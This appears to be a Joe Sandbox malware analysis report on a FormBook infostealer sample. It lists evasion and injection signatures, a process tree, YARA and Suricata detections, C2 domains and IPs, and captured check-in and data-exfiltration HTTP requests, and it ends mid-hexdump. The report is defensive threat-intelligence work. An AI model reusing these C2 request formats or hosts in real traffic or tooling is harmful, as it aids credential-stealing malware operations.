Edit tour

Windows Analysis Report
rACq8Eaix6.exe

Overview

General Information

Sample name:	rACq8Eaix6.exe renamed because original name is a hash value
Original sample name:	004b01b19e0225e92388a04d9792240192952ef47f40679b71fbe6de33982f11.exe
Analysis ID:	1588973
MD5:	e3779c9167a86c1cad7bd494bb7fd15a
SHA1:	5d4498e08c39e028505c14e93a8f2cb371326088
SHA256:	004b01b19e0225e92388a04d9792240192952ef47f40679b71fbe6de33982f11
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

rACq8Eaix6.exe (PID: 4084 cmdline: "C:\Users\user\Desktop\rACq8Eaix6.exe" MD5: E3779C9167A86C1CAD7BD494BB7FD15A)

svchost.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\rACq8Eaix6.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

HSGhOUKfqFw.exe (PID: 3276 cmdline: "C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

msdt.exe (PID: 1576 cmdline: "C:\Windows\SysWOW64\msdt.exe" MD5: BAA4458E429E7C906560FE4541ADFCFB)

HSGhOUKfqFw.exe (PID: 2704 cmdline: "C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4072 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rACq8Eaix6.exe", CommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", ParentImage: C:\Users\user\Desktop\rACq8Eaix6.exe, ParentProcessId: 4084, ParentProcessName: rACq8Eaix6.exe, ProcessCommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", ProcessId: 5260, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\rACq8Eaix6.exe", CommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", ParentImage: C:\Users\user\Desktop\rACq8Eaix6.exe, ParentProcessId: 4084, ParentProcessName: rACq8Eaix6.exe, ProcessCommandLine: "C:\Users\user\Desktop\rACq8Eaix6.exe", ProcessId: 5260, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:59:18.075729+0100	2856318	1	A Network Trojan was detected	192.168.2.5	49979	104.18.73.116	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: rACq8Eaix6.exe	Virustotal: Detection: 59%			Perma Link
Source: rACq8Eaix6.exe	ReversingLabs: Detection: 73%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3913013738.0000000004080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2492972011.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3912887466.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3915092997.0000000005700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2493551934.0000000003400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3911338713.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2494167980.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3913163573.0000000004220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: rACq8Eaix6.exe

Joe Sandbox ML: detected

Source: rACq8Eaix6.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: msdt.pdbGCTL source: svchost.exe, 00000002.00000003.2462008144.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462008144.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000003.2437041170.00000000002FB000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HSGhOUKfqFw.exe, 00000004.00000000.2415537649.000000000020E000.00000002.00000001.01000000.00000005.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3911325478.000000000020E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: rACq8Eaix6.exe, 00000000.00000003.2093784982.0000000004080000.00000004.00001000.00020000.00000000.sdmp, rACq8Eaix6.exe, 00000000.00000003.2094702219.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2399848966.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397612744.0000000003100000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.0000000004480000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2496368379.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2493325915.0000000004120000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.000000000461E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rACq8Eaix6.exe, 00000000.00000003.2093784982.0000000004080000.00000004.00001000.00020000.00000000.sdmp, rACq8Eaix6.exe, 00000000.00000003.2094702219.0000000004220000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2399848966.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2493600903.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397612744.0000000003100000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000005.00000002.3913459249.0000000004480000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2496368379.00000000042DA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000003.2493325915.0000000004120000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913459249.000000000461E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: msdt.exe, 00000005.00000002.3911543722.0000000000592000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913942435.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786008912.000000003CA7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: msdt.exe, 00000005.00000002.3911543722.0000000000592000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000005.00000002.3913942435.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HSGhOUKfqFw.exe, 00000007.00000002.3913197510.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2786008912.000000003CA7C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: msdt.pdb source: svchost.exe, 00000002.00000003.2462008144.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462008144.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, HSGhOUKfqFw.exe, 00000004.00000003.2437041170.00000000002FB000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C3445A
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3C6D1 FindFirstFileW,FindClose,	0_2_00C3C6D1
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C3C75C
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3EF95
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3F0F2
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3F3F3
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C337EF
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C33B12
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3BCBC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001CC730 FindFirstFileW,FindNextFileW,FindClose,	5_2_001CC730

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then xor eax, eax	5_2_001B9DF0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	5_2_001BE409
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_043104E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49979 -> 104.18.73.116:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.mindfulsteps.xyz

Source: Joe Sandbox View	IP Address: 104.18.73.116 104.18.73.116
Source: Joe Sandbox View	IP Address: 104.18.73.116 104.18.73.116
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C422EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_00C422EE

Source: global traffic	HTTP traffic detected: GET /lqir/?oxIxzhP=1XT9/+lPoo+/65GBoLqjY96keXaDBPxKxMdORwDZG72wNLr1ipw6qktNsrB2GbsuFZNPMrA1oNmR/zLhPkjCwfZdncWlSOnlraFB/QZ6SGlkqJPU2RhLExK1aNqo6ZD2rg==&qHO8p=hd0DQ8 HTTP/1.1Host: www.n-vis.groupAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /uktz/?oxIxzhP=jNuUE2eCt+zgeohBMbDMHsqNn0wVhHBnwmF+Aig1D6FjejDgzRRVUK7OGNxnjSLQN1yhaag00jsMis21NrITkWdF4d9GHTGCKMj1pNCfIk9qc2JEKRZoPPtZrmwk1MspVw==&qHO8p=hd0DQ8 HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /o7bo/?qHO8p=hd0DQ8&oxIxzhP=rSNp7HYcuB/095ykRTgGSysZZq4Xde7QSp6ZurvXibSiMmwLx7Dds9OPAwuR2izgPvluyMujHD+7ybxpuR33odEligZnH2OkTHNsRhMxWsmYQ7SYFwHbwr8h5cQ73gRv2A== HTTP/1.1Host: www.dialagiaja18.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /vje0/?oxIxzhP=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFBrdsgaecL8wXZcPHmyvVDo/vbTD/8GqtNcyVsEL78fmdJw==&qHO8p=hd0DQ8 HTTP/1.1Host: www.395608.menAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /zd1g/?qHO8p=hd0DQ8&oxIxzhP=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysilDdp5xTdm5FiVTX/I7wXG7gTv5deuaYX5Iiu5CYwfmrvg== HTTP/1.1Host: www.gkfundeis.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /ryxy/?oxIxzhP=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EJfEwK8gAHnNBpCw6WHIh95k49XlXigw3fJVZK11ld5a0iw==&qHO8p=hd0DQ8 HTTP/1.1Host: www.incgruporxat.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /oeev/?qHO8p=hd0DQ8&oxIxzhP=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFohqWBpxtD+TNClFTqWC2kNfadr7DAmi0av5IfLKJZURhNQ== HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /qp0h/?oxIxzhP=PUKWIHREPS7WoV9Y7jBwDAi8MdJvbPlJZ9RV9HOL13mBnPAwzQgZHDWQnYS4lWYAxPM5HQ5Ne4pDukEiRp2IFK6iZdJZQiZM2owifTnJNmV7NHM+mXk/YCpC72xdsXduFg==&qHO8p=hd0DQ8 HTTP/1.1Host: www.lirio.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Source: global traffic	HTTP traffic detected: GET /4knb/?oxIxzhP=kGhc8cujIy468LEjHl1Bq2PU7Nse09viwjWSLKXwC1cEp+jXGgMaezOIe4V7ze6PoEjekagOfdxn4kQRbl8p+V6gWBX36oJLUl4+OD7m+QqDQo/RbffNhAc3ONEmviUo1g==&qHO8p=hd0DQ8 HTTP/1.1Host: www.espiritismo.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5

Source: global traffic	DNS traffic detected: DNS query: www.n-vis.group
Source: global traffic	DNS traffic detected: DNS query: www.losmason.shop
Source: global traffic	DNS traffic detected: DNS query: www.dialagiaja18.buzz
Source: global traffic	DNS traffic detected: DNS query: www.395608.men
Source: global traffic	DNS traffic detected: DNS query: www.gkfundeis.net
Source: global traffic	DNS traffic detected: DNS query: www.incgruporxat.click
Source: global traffic	DNS traffic detected: DNS query: www.holytur.net
Source: global traffic	DNS traffic detected: DNS query: www.lirio.shop
Source: global traffic	DNS traffic detected: DNS query: www.espiritismo.info
Source: global traffic	DNS traffic detected: DNS query: www.mindfulsteps.xyz

Source: unknown

HTTP traffic detected: POST /uktz/ HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.losmason.shopReferer: http://www.losmason.shop/uktz/Content-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5Data Raw: 6f 78 49 78 7a 68 50 3d 75 50 47 30 48 47 32 56 76 2b 44 65 62 50 6c 79 44 62 58 39 52 66 43 70 73 46 4d 6d 77 32 74 34 79 6e 46 6c 44 7a 51 55 4f 70 42 73 45 68 50 6d 6b 42 56 4e 64 4a 66 67 43 4c 68 65 69 53 7a 6c 43 33 47 6b 4d 4d 70 4b 78 67 51 50 71 4d 75 6f 50 50 77 4b 76 31 68 46 2b 50 5a 41 4f 44 4f 66 51 72 57 62 76 5a 36 4c 48 52 56 44 41 53 78 71 47 52 4e 73 46 36 4d 42 67 55 45 72 7a 50 70 37 50 38 64 47 46 56 49 43 52 58 63 7a 72 36 43 64 62 65 49 55 6b 4f 41 73 36 33 76 73 65 5a 4c 34 58 76 4b 58 45 4c 49 33 7a 71 43 62 50 4d 45 62 73 63 43 73 2b 78 6f 45 2b 49 65 34 56 70 30 2f 79 56 45 55 38 4e 41 3d Data Ascii: oxIxzhP=uPG0HG2Vv+DebPlyDbX9RfCpsFMmw2t4ynFlDzQUOpBsEhPmkBVNdJfgCLheiSzlC3GkMMpKxgQPqMuoPPwKv1hF+PZAODOfQrWbvZ6LHRVDASxqGRNsF6MBgUErzPp7P8dGFVICRXczr6CdbeIUkOAs63vseZL4XvKXELI3zqCbPMEbscCs+xoE+Ie4Vp0/yVEU8NA=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 06:59:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 